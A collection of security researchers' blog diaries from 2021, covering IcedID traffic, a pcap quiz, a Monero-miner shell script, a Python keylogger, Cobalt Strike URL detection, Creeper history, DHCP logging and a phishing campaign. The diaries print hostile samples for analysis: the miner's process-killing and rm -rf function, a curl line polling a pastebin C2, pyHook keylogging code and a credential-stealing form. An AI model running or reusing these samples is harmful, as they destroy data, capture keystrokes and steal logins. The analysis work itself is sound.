Of note, several hours after the infection, we started seeing  different domains and IP addresses for the IcedID command and control (C2) traffic as shown below.

Shown above:  C2 domains and IP address for the IcedID infection change near the end of the pcap.

Using WIreshark's Export HTTP Objects function, you can export the initial malware DLL and the fake gzip file used for IcedID's new "gziploader" technique to infect the host.  There are two copies of each file in the pcap.  See the image below for details.

Shown above:  Exporting initial DLL and fake gzip file from the pcap.

Perhaps the most easily identifiable characteristic of recent IcedID infections is the license.dat file referenced in the scheduled task.  This binary data file is used by the initial and persistent IcedID DLL to infect and keep the infection persistent.

Shown above:  Action from the scheduled task, where rundll32.exe uses license.dat when running the persistent IcedID DLL.

Final Words

This "gziploader" technique used by IcedID is fairly new, so some people in the infosec community might not be fully aware of it yet.  However, post-infection activity remains noticeably similar to what we've seen with IcedID malware in the past few months before the update.

A zip archive with a pcap of the infection traffic is available in this Github repository, which also contains malware and artifacts from the infected computer.

---

Brad Duncan
brad [at] malware-traffic-analysis.net

Introduction

Today's diary is a new traffic analysis quiz.  For this quiz, I ask participants to write an incident report that identifies the affected Windows host and user account.

If possible, try to identify the malware family associated with this infection.  But there are many different types of malware, and they're constantly evolving and multiplying, so don't worry if you don't recognize the malware family.

Shown above:  So much malware out there.

The packet capture (pcap) for today's traffic analysis quiz is contained in a zip archive hosted at this Github repository.  The repository also contains another zip archive with malware and artifacts recovered from the infected Windows host.  Be very careful with the malware and artifacts zip.  If you don't know what you're doing, do not download the malware and artifacts.  I also recommend participants do this exercise in a non-Windows environment, if possible.

Unlike my previous traffic analysis quizzes, this quiz does not include any alerts on the network traffic.

Shown above:  Pcap for this traffic analysis quiz opened in Wireshark.

Requirements

This type of analysis requires Wireshark.  Wireshark is my tool of choice to review pcaps of infection traffic.  However, default settings for Wireshark are not optimized for web-based malware traffic.  That's why I encourage people to customize Wireshark after installing it.  To help, I've written a series of tutorials.  The ones most helpful for this quiz are:

• Wireshark Tutorial: Changing Your Column Display
• Wireshark Tutorial: Identifying Hosts and Users
• Wireshark Tutorial: Display Filter Expressions
• Using Wireshark - Exporting Objects from a Pcap

I always recommend participants use a non-Windows environment like BSD, Linux, or macOS.  Why?  Because most pcaps in these traffic analysis quizzes contain traffic with Windows-based malware.  If you're using a Windows host to review such pcaps, your antivirus (or Windows Defender) may delete or alter the pcap.  Worst case?  If you extract malware from a pcap and accidentally run it, you might infect your Windows computer.

In this case, I've also included a zip archive that contains malware and artifacts retrieved from the infected Windows host.  Unless you are a skilled malware analyst, you should avoid examining the contents of that particular zip archive on a Windows computer, because it's Windows-based malware.

Active Directory (AD) Environment

The infected Windows host is part of an AD environment, so the pcap contains information about the Windows user account. The user account is formatted as firstname.lastname.  The AD environment characteristics are:

• LAN segment range: 172.16.4.0/24 (172.16.4.0 through 172.16.4.255)
• Domain: baritonetv.com
• Domain Controller: 172.16.4.4 - BaritoneTV-DC
• LAN segment gateway: 172.16.4.1
• LAN segment broadcast address: 172.16.4.255

Final Words

Again, the zip archive with a pcap of the traffic for this exercise is available in this Github repository.  Analysis of this infection will be posted in tomorrow's ISC diary.

---

Brad Duncan
brad [at] malware-traffic-analysis.net

On Tuesday's Stormcast, Johannes talked about malware written in the Nim Programming language.

Internally, strings in the Nim programming language are stored inside a structure (STRING_LITERAL) that consists of 2 integers followed by the string.

Both integers represent the length of the string, although the second integer has one bit set to indicate it is a string literal.

Here is an example of a program I wrote and compiled to a 32-bit PE file:

In red is the string itself (17 bytes long, 0x11). Green is the first integer: the length of the string (0x00000011) encoded as a little-endian 32-bit integer (0x11000000). Yellow is the second integer: the length of the string encoded as a little-endian 32-bit integer with the 3rd most-significant bit set (0x00000011 + x40000000 -> 0x11000040).

I wrote a Python script to extract these strings. It's beta: I still have to decided if and how to integrate this in my strings.py tool).

Unlike the classic tool strings, this tool will also extract strings that contain non-printable characters.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

I have a couple of questions on my diary entry "Finding Metasploit & Cobalt Strike URLs", thus I made a video that shows the method and explains in detail the checksum calculation.

I don't use this method to go hunting (in proxy logs for example), as the checksum has a low-entropy, thus prone to collisions/false positives. But I do use this when I suspect the presence of Metasploit or Cobalt Strike traffic.

Cobalt Strike beacons often use HTTPS, but the URLs I talked about in my diary entry, are not the ones used by the beacon itself. These are the URLs of the staging shellcode, that precedes the beacon.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

There's a new version of YARA on GitHub, a pre-release for version 4.1.0.

We can expect the actual version 4.1.0 soon.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

With the growing threat of ransomware attacks, they are other malicious activities that have less attention today but they remain active. Think about crypto-miners. Yes, attackers continue to mine Monero on compromised systems. I spotted an interesting shell script that installs and runs a crypto-miner (SHA256:00e2ddca696426d9cad992662284d1f28b9ecd44ed7c1be39789417c1ea9a5f2[1]).

The script looks to be a classic one but there are some interesting behaviours that I'd like to share.

Such scripts, before launching the miner, are trying to get rid of previously installed concurrent tools. I already covered this in a previous diary[2] but how do they behave today? The script implements a function kills() that searches for existing miners and kills them. But it goes one step further: It also checks for established connections to specific ports or IP addresses!

function kills() {
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
ps auxf|grep -v grep|grep "mine[.]moneropool[.]com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash[.]com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum[.]f2pool[.]com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/var/tmp/sustes" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9
pkill -f biosetjenkins
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f xmrig
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f XbashY
pkill -f libapache
pkill -f qW3xT.2
pkill -f /usr/bin/.sshd
pkill -f sustes
pkill -f Xbash
rm -rf /var/tmp/j*
rm -rf /tmp/j*
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json /var/tmp/kworkerds /var/tmp/config.json /usr/local/lib/libjdk.so
rm -rf /tmp/.systemd-private-*
chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3
chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate
rm -rf /etc/rc.d/rc*.d/S01nfstruncate /bin/nfstruncate
netstat -anp | grep 69[.]28[.]55[.]86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 185[.]71[.]65[.]238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 140[.]82[.]52[.]87 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
p=$(ps auxf|grep -v grep|grep kworkerds|wc -l)
if [ ${p} -eq 0 ];then
    netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    ps auxf|grep -v grep | awk '{if($3>=90.0) print $2}'| xargs kill -9
fi
}

This function is a perfect candidate to be rewritten from a defender's point of view and used to detect a potential miner running on your computers!

The second interesting point is the use of pastebin.com not only to download malicious payloads but also as a very simple C2 communication channel. Do you know that, when you create a pastie, you can edit it later:

The script (executed from a corn job), grabs the content of a pastie and, base on the content, behaves in different ways:

update=$( curl -fsSL --connect-timeout 120 hxxps://pastebin[.]com/raw/SSCy7mY7 )
if [ ${update}x = "update"x ];then
    echocron
else
    ...

The current pastie content:

remnux@remnux:/MalwareZoo/20210319$ curl hxxps://pastebin[.]com/raw/SSCy7mY7
noupdate

Simple but effective!

[1] https://www.virustotal.com/gui/file/00e2ddca696426d9cad992662284d1f28b9ecd44ed7c1be39789417c1ea9a5f2/detection
[2] https://isc.sans.edu/forums/diary/The+Crypto+Miners+Fight+For+CPU+Cycles/23407

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

A keylogger is one of the core features implemented by many malware to exfiltrate interesting data and learn about the victim. Besides the fact that interesting keystrokes can reveal sensitive information (usernames, passwords, IP addresses, hostnames, ...), just by having a look at the text typed on the keyboard, the attacker can profile his target and estimate if it's a juicy one or not. 

To follow up on my yesterday diary[1], Microsoft Windows provides API calls to implement a keylogger via API calls like GetKeyState() and GetAsyncKeyState() help to determine if a particular key is pressed[2]. But, can attackers implement a keylogger in other languages?

In 2019, I wrote a diary about a keylogger in PowerShell[3]. Seeing that Python becomes more and more popular in the Windows eco-system, I searched for some samples. I found one that was published as a PoC[4] already six years ago(!) but still used in the wild today. It was again submitted to VT a few weeks ago (SHA256:fe057c31951304a59ff6a59f58e49373c736e75305dcd0c53391d310337ccb41[5]) and has still a very nice score (only 3/59).

The implementation is Python is extremely easy thanks to the pyHook module:

import  pyHook, pythoncom
data=''
def GetKeyPressedAndSendIt(event):
    global data
    if event.Ascii==13:
        keys='<ENTER>'
    elif event.Ascii==8:
        keys='<BACK SPACE>'
    elif event.Ascii==9:
        keys='<TAB>'
    else:
        keys=chr(event.Ascii)
    data=data+keys

hm = pyHook.HookManager()
hm.KeyDown = GetKeyPressedAndSendIt
hm.HookKeyboard()
pythoncom.PumpMessages(

I performed a quick retro hunt on VT to search for the same kind of script and found only 9 occurences:

Hash	Type	Score	Upload Time
ebb80bf4d9768ed7ee9ade739304453ac3474bfdbf06d8a414563aa1bf19592f	PE	3/68	2021-02-21 02:51:42 UTC
675757ca9bc6b3be10913e5a4ee43bea371ad8f826c5a25d4c0e38e90bfb1f25	PE	2/70	2021-02-17 04:48:20 UTC
79b53c72eeb936161ed8069da5e6ccddd42cc993b90ac67fb5262abc194e8797	Script	1/59	2021-02-15 11:43:15 UTC
a518235828977df57f0c3442390729affce92ed4613f8fb3cdda48f06d8712b9	Script	0/59	2021-02-02 02:07:36 UTC
cd8e126b6305cd97486877bbe1db8e3dfe2653a63d451484399f12ebff339ed3	Script	12/58	2021-02-08 22:35:34 UTC
f3d38383b0bf68204bd755ce80110915858b48c860bc7b76d91ec1c7dcb07058	Script	10/58	2021-01-22 22:22:23 UTC
395d51c3fdb2f8281cf0a9d9815f256d5f50d6eddd20d36d9eb33938be921d97	PE	13/70	2021-01-17 06:30:19 UTC
9866864b511576fe2421b469d163d8d942c29a7651c5f7f505750c70734b1183	Script	0/56	2021-01-15 14:44:05 UTC
365b45370d4db7600195c126d700de6e31d4d4084d14ff8e12a4371d84c89c85	Script	1/60	2020-12-21 00:34:00 UTC

As you can see, the peak of submitted samples occurred between mid-January and mid-February.

[1] https://isc.sans.edu/forums/diary/Defenders+Know+Your+Operating+System+Like+Attackers+Do/27212/
[2] https://gist.github.com/aktau/11057438
[3] https://isc.sans.edu/forums/diary/Simple+Powershell+Keyloggers+are+Back/24676
[4] https://github.com/HacKeD0x90/PythonKeyLogger
[5] https://www.virustotal.com/gui/file/fe057c31951304a59ff6a59f58e49373c736e75305dcd0c53391d310337ccb41/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Not a technical diary today but more a reflection… When I’m teaching FOR610[1], I always remind students to “RTFM” or "Read the F… Manual". I mean to not hesitate to have a look at the Microsoft document when they meet an API call for the first time or if they are not sure about the expected parameters.

Many attackers have a very deep knowledge of how targeted operating systems are behaving and what are the controls in place or features that could be (ab)used by malicious code. When you’re analyzing malware samples, it’s very important to quickly spot interesting blocks of code (by learning which interesting OS feature they use). A classic example is the API call VirtualAllocEx()[2] which allocates a region of memory within the virtual address space of a specified process:

LPVOID VirtualAllocEx(
  HANDLE hProcess,
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flAllocationType,
  DWORD  flProtect
);

hProcess is a handle to a process returned by OpenProcess(). Then, you use WriteProcessMemory() to write specified contents into the memory of the targeted process. When you read this, you can ask yourself: “Wait… why does Microsoft allow a process to inject code into another process?”. The answer is simple: because it’s a key feature of the operating system and it can be used for many totally legit reasons. Think about antivirus programs! It’s common that AV injects code into processes of a process (ex: in browsers to inspect downloaded data).

API calls are a key aspect of malware, not only the function itself but also its options. Here is another example: If you see a VirtualProtect, check the last parameter:

LPVOID VirtualAlloc(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flAllocationType,
  DWORD  flProtect
);

flProtect allows you to set the memory protection for the region of pages to be allocated. If you see the value 0x40 (PAGE_EXECUTE_READWRITE) set for this parameter, it means the newly allocated memory will contain executable code![3]

An approach to flag some sample during the triage process is to identify the group of API’s that are used to perform suspicious actions like:

• Code injection
• DLL operations
• Dropping 2nd stage
• …

In my triage process, I use FLOSS[4] because it can extract a lot of API calls from strings, stack strings, etc… Then I parse the output to YARA to match interesting groups of API. Example:

remnux@remnux:/MalwareZoo/20210316$ floss sample.exe | ./yarawrapper.py suspicious-api-calls.yara
Matching: api_address_search
Matching: dll_operations

Why YARA? Because it helps to create useful rules like "any of this", "all of this", and, or, groups of APIs. A sample of YARA rules is available here[5].

Happy hunting!

[1] http://for610.com
[2] https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex
[3] https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants
[4] https://github.com/fireeye/flare-floss
[5] https://github.com/xme/yara-rules/blob/main/suspicious-api-calls.yara

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

If you have any interest in the history of malicious code, chances are you’ve heard or read somewhere that the first piece of malware ever created was a computer worm called Creeper and that spread itself through the ARPANET in 1971. Some sources even mention that it might have been on this very date, i.e. exactly 50 years ago[1].

So does malware really turn 50 today?

Not likely. Even leaving aside that according to some sources[2], there may have been a fork bomb[3] program created all the way back in 1969, and therefore the oldest malware might already be over 50 years old, the simple fact is that Creeper wasn’t malware in any sense of the word... Alhough it was probably the first example of a (benign) computer worm ever created.

In the multiple retellings of its legend that may be found both online and in print, we have, however, a prime example of something which is unfortunately relatively common (not just) in infosec. That is repeating of interesting-looking information without checking for any original sources, which might provide context to it. I don’t mind admitting that this is a pet peeve of mine[4] and so I thought that on this day, which may or may not mark the 50th anniversary of the original “run” of Creeper, it might be a good idea to take a look at what we really know about it.

According to the few trustworthy articles on the subject, which cite their sources[5,6], and explanations provided by Ray Tomlinson, who played a significant part in the story of Creeper[7,8], the program was created at BBN technologies at some point in 1971. At that time, BBN was developing the TENEX an operating system for the PDP-10 computer. One of the developers of TENEX was Robert Thomas, who, among other projects, worked on what was called a Resource Sharing Executive, or RSEXEC – an experiment with what was thought of as a “mobile application” concept. RSEXEC was basically supposed to enable a program to “jump” between computers in order for it to always be executed by a machine with unutilized computational resources or with data, which the program needed. As you’ve probably guessed, Creeper was the demonstration program, which resulted from Thomas’s work.

The original application was tested using (at most) 28 computers connected to the ARPANET and running the TENEX OS. Creeper migrated from one system to another, always "removing" itself from the machine, when it was leaving it. What is important to note is that this was done with full agreement and cooperation of operators of all those computers and that the test had no negative effects on them.
All that the Creeper supposedly did on “visited” computers was printing the famous message “I’M THE CREEPER : CATCH ME IF YOU CAN” on a teletype.

Message printed by Creeper[5]

An indeterminate amount of time later, Ray Tomlinson, who worked at BBN Technologies at the same time as Bob Thomas, created a modified version Creeper. The program originally jumped from one machine to another, which meant that there was always only one copy of it on the entire network (computer worms which behave in this way are sometimes called “rabbits”). The new version, which was created by Tomlinson, had the ability to replicate itself, i.e. create multiple copies of itself, which might exist at the same time on different machines (meaning it behaved more like a usual computer worm). This updated version was - once again - not malicious in any way and one may think of it as a demonstration of the concept of distributed computation more than anything else.

Since it was able to replicate itself and it was necessary to make sure it didn’t cause any problems even in case of bugs which might make it hang, Tomlinson also created a program called Reaper. This was a simple piece of code, which visited each of the approximately 28 computers, which might have hosted Creeper, and terminated any instances of Creeper it found running on them.

Due to this behavior, Reaper is sometimes called “the first anti-virus”[9]. Since neither version of Creeper was malicious in any way, depending on your definition of "anti-virus" this title may or may not be applicable. Reaper however almost certainly may be called the first “nematode” (a worm or virus, which removes another worm or virus from a system, on which it is present).

So, based on the history ve'we recounted, what may we say with any sort of certainty regarding the age of malware? Not much. In terms of the age of computer worms, however, chances are good that they really are really turning 50 this year, whether it is today or not. It is a little bit sad that one tends to think of every computer worm as being malicious “by default”, since, as this little trip down the memory lane shows us, it doesn’t necessarily have to be true...

In any case, if you’d like to learn a bit more about the origins of modern malware (and don’t mind low-quality video editing), the following video might be worth your time.

[1] https://www.cybersecurity-insiders.com/a-brief-history-of-cybersecurity/
[2] http://catb.org/~esr/jargon/html/W/wabbit.html
[3] https://en.wikipedia.org/wiki/Fork_bomb
[4] https://untrustednetwork.net/en/2019/10/19/do-automated-tools-really-detect-only-45-of-all-vulnerabilities/
[5] https://corewar.co.uk/creeper.htm
[6] http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.137.9511&rep=rep1&type=pdf
[7] https://history-computer.com/the-first-computer-virus-of-bob-thomas-complete-history/
[8] https://nerdology.org/2014/11/qa-with-ray-tomlinson-on-creeper/
[9] https://en.wikipedia.org/wiki/Reaper_(program)

-----------
Jan Kopriva
@jk0pr
Alef Nula

Metasploit and Cobalt Strike generate shellcode for http(s) shells. The URLs found in this shellcode have a path that consist of 4 random alphanumeric characters. But they are not completely random: their 8-bit checksum is a member of a small set of constants.

The 8-bit checksum is the sum of the ASCII value of the 4 characters of the path. Take the least significant byte of the sum, and compare it with this table:

If the checksum is equal to one of these values, the URL could be generated by Metasploit or Cobalt Strike.

I illustrate this with Brad's capture file of Qakbot & Cobalt Strike traffic and my tool metatool.py.

Wireshark's command-line tool tshark is what I used to produce a complete packet tree for each packet. The URLs we are looking for will be somewhere in this output:

And then I pipe this output into my metatool.py with command url8:

metatool found 2 (identical) URLs whose path has an 8-bit checksum equal to 0x5C (92), or URI_CHECKSUM_INITW, i.e. the 8-bit checksum for a Windows payload.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

Wireshark version 3.4.4 was released.

There's one vulnerability fix and many bug fixes.

The vulnerability is that Wireshark could open unsafe URLs, as illustrated in a video posted with the bug report.

 

Didier Stevens

Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

 

This parser takes the logs from a Windows 2012R2 server (C:\Windows\System32\dhcp) and parses them into usable metatada which can be monitored via a dashboard. The logs have been mapped using ECS in the same format as the packetbeat meta here [1].

→ First step is to load the Microsoft DHCP templates [3][4] via Kibana Dev Tools to create the microsoft.dhcp Index Management and Index Lifecycle Policy. Follow the instructions at the top of each of template.

→ Second step is to install Logstash (if not already done) and add to Logstash [2] configuration file (i.e. /etc/logstash/conf.d/logstash-filter-dhcp.conf).

The configuration file contains a Logstash filter use to compare the host MAC address OUI against a local list (in this configuration it is: oui.yml). Get OUI list from the web and convert it into a yml list saved in the /opt directory.

- In Linux, using wget, download the file:

• wget http://standards-oui.ieee.org/oui/oui.txt

- Create the list in the /opt directory and run the following command to create the OUI file (this regex will delete tabs, spaces and @ ):

• # cat /opt/oui.txt | grep 'base 16' |sed -e 's/\([[:xdigit:]]\{6\}\).*(base 16)\t\t\(.*\)\r/"\1": \2/gi' | tr -d '@' > /opt/oui.yml

Start the Logstash service and verify under Stack Mangement → Index Management for an indice similar to microsoft.dhcp-2021.03.12-000001 created.

→ Third step is to install filebeat on the Windows server, configured as a service and change the filebeat.yml configuration to only contain the following information. Change the IP address in this file to the IP address of the logstash service:

# This filebeat shipper is used with
# for Microsoft DHCP logs

# 9 Jan 2021
# Version: 1.0

filebeat.inputs:

# Filebeat input for Microsoft DHCP logs

- type: log
  paths:
    - "C:/Windows/System32/dhcp/DhcpSrvLog-*.log"
  include_lines: ["^[0-9]{2},"]
  fields_under_root: true

#==================== Queued Event ====================
#queue.mem:
#  events: 4096
#  flush.min_events: 512
#  flush.timeout: 5s

#queue.disk:
#  path: "/op/filebeat/diskqueue"
#  max_size: 10GB

#==================== Output Event ====================
output.logstash:
  hosts: ["192.168.2.23:5044"]

At this point, the logs should start going to ELK. From the Windows server, verify the connection has been established by running at the command line: netstat -an | findstr 5044

In the Elasticsearch server, under Stack Management -> Index Management, lock for an new instance with microsoft.dhcp-* (something like this: microsoft.dhcp-2021.03.12-000001) should start showing new metadata has been received.

→ Last step is to load the dashboard [5] to Elasticsearch under Stack Management -> Saved Objects and Import the file Microsoft_DHCP_7.11_v1.ndjson, this will load the new dashboard and the Index Pattern.

The dashboard should have this look and feel:

The DHCP log format being parsed:

ID,Date,Time,Description,IP Address,Host Name,MAC Address,User Name, TransactionID, QResult,Probationtime, CorrelationID,Dhcid,VendorClass(Hex),VendorClass(ASCII),UserClass(Hex),UserClass(ASCII),RelayAgentInformation,DnsRegError.

Since DHCP is a protocol that do not need any authentication from the client, any clients within the network can obtain a lease for an IP. It is good housekeeping to monitor and be on the lookout for strange hostnames and unknown or unidentified vendor MAC addresses, to monitor what is accessing the network.

[1] https://www.elastic.co/guide/en/beats/packetbeat/master/exported-fields-dhcpv4.html
[2] https://handlers.sans.edu/gbruneau/elk/logstash-filter-dhcp.conf
[3] https://handlers.sans.edu/gbruneau/elk/Windows_DHCP_ilm_policy.txt
[4] https://handlers.sans.edu/gbruneau/elk/Windows_DHCP_template.txt
[5] https://handlers.sans.edu/gbruneau/elk/Microsoft_DHCP_7.11_v1.ndjson
[6] https://isc.sans.edu/forums/diary/Secure+Communication+using+TLS+in+Elasticsearch/26902/
[7] https://www.elastic.co/guide/en/ecs/1.8/ecs-field-reference.html
[8] https://handlers.sans.edu/gbruneau/elastic.htm

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

[This is a guest diary submitted by JB Bowers]

In line with our recent diaries featuring unique attack vectors for credential theft, such as phishing over LinkedIn Mail[1] and pretending to be an Outlook version update[2], we've recently learned of a phishing campaign targetting users of the Infographic service Piktochart.

During the COVID-19 pandemic, nearly every kind of company has moved to use more online collaboration tools.  This means that many small businesses, universities, primary and secondary schools, and others that may not be well-trained in online safety will be especially vulnerable to this type of attack, especially if they are using a relatively new tool, like Piktochart.

I had not used Piktochart before, but this week, security researcher @pageinsec[3] shared with me an infographic that asks the user to click on a link, in order to read a shared pdf document [4].

Piktochart has about 2,000 registered users, and about 24 million Piktocharts Created and is used by companies such as Forbes, TechCrunch, and others, according to their website.  With a legitimate business purpose that is endorsed by some large companies, it is likely this is an effective way for the attackers to evade DNS filtering or other simple defenses against credential-stealing attacks.

Piktochart has a feature that makes it even better for phishing:  Their registered "Pro users" can download an actual .pdf file, with the malicious link intact, or as well render the file into several different sizes of .png images, as indicated in the IOCs near the bottom of this page, which might be useful to hunt for similar activity.

An unsuspecting victim would receive an e-mail or social media post including the malicious Piktochart, from someone they knew, whose account had already been compromised.  If they click the link, a 2nd stage credential stealer follows, which is a pretty decent-looking (but fake) Microsoft login page hosted at the domain obggladdenlightfoundation(.)org.  This base domain currently has "0 out of 87" vendors reporting it as malicious on Virus Total, and is made out to be a non-profit in Lagos, Nigeria.  This specific example had a different site registration than most of the other, identical sites I've researched, so it is possible this site was the result of a takeover of a legitimate business' WordPress website, or a redirection of the site's DNS.

Despite the technical simplicity, this is a dangerous campaign since it is after Microsoft 0365 credentials, and evidence points to the same IP being used for a large variety of credential theft sites.   There are  quite a few  domains on the same IP[5], for example: 

pwan-heritage(.)com/pol/OfficeV4/*    
secure-official-spotify.pwanplus(.)com       
www.dhl-delivery-failure-resolve.naijamail.com  - This one includes a nice-looking DHL form [6]

Indicators of compromise - IOCs  

URLS/Domains
create.piktochart.com/output/52653368-my-visual
piktochart.com (if not needed for businses)

2nd stage/stealer
obggladdenlightfoundation.org/dfsmith/ofc3
obggladdenlightfoundation.org/dfsmith/ofc3/
obggladdenlightfoundation.org/dfsmith/ofc3/r.php?signin=d41d8cd98f00b204e9800998ecf8427e&auth=39bea2eedcf78c893b4d0898d91bba501390ced533b8de1d796bcc5973da76e5b1cf6668
obggladdenlightfoundation.org/dfsmith/ofc3/s/?signin=d41d8cd98f00b204e9800998ecf8427e&auth=39bea2eedcf78c893b4d0898d91bba501390ced533b8de1d796bcc5973da76e5b1cf666

IP
%%ip:173.231.197.145%% [7]
Hostname:    ded5495.inmotionhosting.com

Domain registrar: 007NAMES INC.
*Used in most of the domains

Microssoft cred stealer image - hashes(sha2) 
7, 10, and 3kb versions of the same image
a90370dc587b73cd2dbe33504794e83c83dc9f365cd9cd94511593046db5ae09
bc2afe6e49541902541497a6823e1aa0f8e8683e203d4da6bc75590bddebeb702bed6013d59910f6714448cafeda98708886d48978b6b991627526964379efc0

DOM (cred-stealer page)
"
<form id="1MDAwMDMxMjAyMS0wMy0wMjE2MTQ2NTgwMDQ4NTgxMTAx"> <input type="hidden" value="[removed]"><input type="hidden" value="[removed"> </form>
"

Post request
"form id="f2" method="post" action="#" style="margin-bottom: 0px;"> <input required="" type="email" placeholder="Email, phone, or Skype" name="e"
    style="outline:none; background-color:transparent;border:0px solid;height:30px;width:300px;font-weight:lighter;font-size:15px;margin-left:5px;padding-bottom:0px;padding-top:0px;"> <img
    src="data:image/png;base64"...

Cookies
obggladdenlightfoundation.org/    1969-12-31
23:59:59    Name: PHPSESSID
obggladdenlightfoundation.org/dfsmith/ofc3/s    1969-12-31
23:59:59    Name: ip11

 JB Bowers
@cherokeejb_

References:
[1] - https://isc.sans.edu/forums/diary/The+new+LinkedInSecureMessage/27110
[2] - https://isc.sans.edu/forums/diary/Pretending+to+be+an+Outlook+Version+Update/27144/
[3] - https://apageinsec.wordpress.com/
